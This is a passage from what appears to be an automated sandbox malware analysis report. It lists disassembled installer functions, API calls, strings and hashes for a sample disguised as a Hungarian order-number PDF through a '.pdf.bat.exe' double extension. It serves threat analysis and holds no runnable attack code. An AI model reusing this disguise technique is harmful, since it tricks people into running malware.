                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                              • String ID: %ls=%ls$[Rename]
                                              • API String ID: 2171350718-461813615
                                              • Opcode ID: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                              • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                              • Opcode Fuzzy Hash: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                              • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                              Function 00406518 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                              • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406519, 0040651E
                                              • "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe", xrefs: 00406518
                                              • *?|<>/":, xrefs: 0040656A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 589700163-3880308851
                                              • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                              • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                              • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                              • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                              Function 00404262 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                              • GetSysColor.USER32(00000000), ref: 004042BD
                                              • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                              • SetBkMode.GDI32(?,?), ref: 004042D5
                                              • GetSysColor.USER32(?), ref: 004042E8
                                              • SetBkColor.GDI32(?,?), ref: 004042F8
                                              • DeleteObject.GDI32(?), ref: 00404312
                                              • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                              • Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                              • Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54
                                              Function 6FBC2398 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC24DA
                                                • Part of subcall function 6FBC122C: lstrcpynW.KERNEL32(00000000,?,6FBC12DF,00000019,6FBC11BE,-000000A0), ref: 6FBC123C
                                              • GlobalAlloc.KERNEL32(00000040), ref: 6FBC2460
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FBC247B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              • Associated: 00000000.00000002.2603737645.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603777952.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603791388.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fbc0000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                              • String ID: @Hmu
                                              • API String ID: 4216380887-887474944
                                              • Opcode ID: 7396451d500e0eb79ffaa87f783c11e8834303f914b8992756469d35cf17c2cc
                                              • Instruction ID: db749e62777e04b98fe5898cc867fb79465e591b0806c82f5b57ab7b1beee89d
                                              • Opcode Fuzzy Hash: 7396451d500e0eb79ffaa87f783c11e8834303f914b8992756469d35cf17c2cc
                                              • Instruction Fuzzy Hash: E741DEB5008385EFD714DF25E840AAB77B8FB8A324F005A9EE946D7580DB30A585CB63
                                              Function 00404BB6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                              • GetMessagePos.USER32 ref: 00404BD9
                                              • ScreenToClient.USER32(?,?), ref: 00404BF3
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                              • Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                              • Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4
                                              Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                              • MulDiv.KERNEL32(000F231B,00000064,000F251F), ref: 00402E3C
                                              • wsprintfW.USER32 ref: 00402E4C
                                              • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                              Strings
                                              • verifying installer: %d%%, xrefs: 00402E46
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: verifying installer: %d%%
                                              • API String ID: 1451636040-82062127
                                              • Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                              • Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
                                              • Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                              • Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98
                                              Function 6FBC256D Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 6FBC121B: GlobalAlloc.KERNEL32(00000040,?,6FBC123B,?,6FBC12DF,00000019,6FBC11BE,-000000A0), ref: 6FBC1225
                                              • GlobalFree.KERNEL32(?), ref: 6FBC265B
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC2690
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              • Associated: 00000000.00000002.2603737645.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603777952.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603791388.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fbc0000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: bd4d9e21d16bd823aaeafd3671a297b987c34730712b7642fe0c4b99339b2682
                                              • Instruction ID: bf11c0eb78e3d9f535ae75cb98c9bed005553313ee1bdb1ffbc4a52bc972a8b6
                                              • Opcode Fuzzy Hash: bd4d9e21d16bd823aaeafd3671a297b987c34730712b7642fe0c4b99339b2682
                                              • Instruction Fuzzy Hash: 6A31F032504681EFCB10DF64ED98D6B77B6FB8B31471515B9F58187260C730A926CB32
                                              Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                              • String ID:
                                              • API String ID: 2667972263-0
                                              • Opcode ID: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                              • Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
                                              • Opcode Fuzzy Hash: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                              • Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98
                                              Function 00404AA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                              • wsprintfW.USER32 ref: 00404B52
                                              • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s$6B
                                              • API String ID: 3540041739-3884863406
                                              • Opcode ID: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                              • Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
                                              • Opcode Fuzzy Hash: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                              • Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8
                                              Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nso4347.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nso4347.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidelstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nso4347.tmp$C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll
                                              • API String ID: 3109718747-3922688546
                                              • Opcode ID: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
                                              • Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
                                              • Opcode Fuzzy Hash: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
                                              • Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E
                                              Function 6FBC18DD Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              • Associated: 00000000.00000002.2603737645.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603777952.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603791388.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fbc0000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: FreeGlobal
                                              • String ID:
                                              • API String ID: 2979337801-0
                                              • Opcode ID: c4253058805baffdaa6720d6fcee7642606e222f3d2a8b55b4d1cd7272efe5db
                                              • Instruction ID: 401ed7753318b08e4f616b08a9082879aa566be760cbe75ae28eca02182daae3
                                              • Opcode Fuzzy Hash: c4253058805baffdaa6720d6fcee7642606e222f3d2a8b55b4d1cd7272efe5db
                                              • Instruction Fuzzy Hash: 4D518435D041D99A8B109FB8E5406EFBAB5EF46354F1D826BF430B7140D7B1BA8286A3
                                              Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(?), ref: 00401DBC
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                              • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                              • String ID:
                                              • API String ID: 3808545654-0
                                              • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                              • Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
                                              • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                              • Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D
                                              Function 6FBC1621 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FBC21F0,?,00000808), ref: 6FBC1639
                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FBC21F0,?,00000808), ref: 6FBC1640
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FBC21F0,?,00000808), ref: 6FBC1654
                                              • GetProcAddress.KERNEL32(6FBC21F0,00000000), ref: 6FBC165B
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC1664
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              • Associated: 00000000.00000002.2603737645.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603777952.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603791388.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fbc0000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                              • String ID:
                                              • API String ID: 1148316912-0
                                              • Opcode ID: 1185ecaf1ddffb18dfa10a9f32312c18d0abfcd4a932434555fb547f88cb3dd2
                                              • Instruction ID: b184dca3b42f947398e06fcd1b3889a9e230ec1ec42e43ff1c3b289b345976b8
                                              • Opcode Fuzzy Hash: 1185ecaf1ddffb18dfa10a9f32312c18d0abfcd4a932434555fb547f88cb3dd2
                                              • Instruction Fuzzy Hash: EDF012731065387BDA2116A78C4DD9BBE9CDF8F2F5B160251F618D219085614C12D7F1
                                              Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
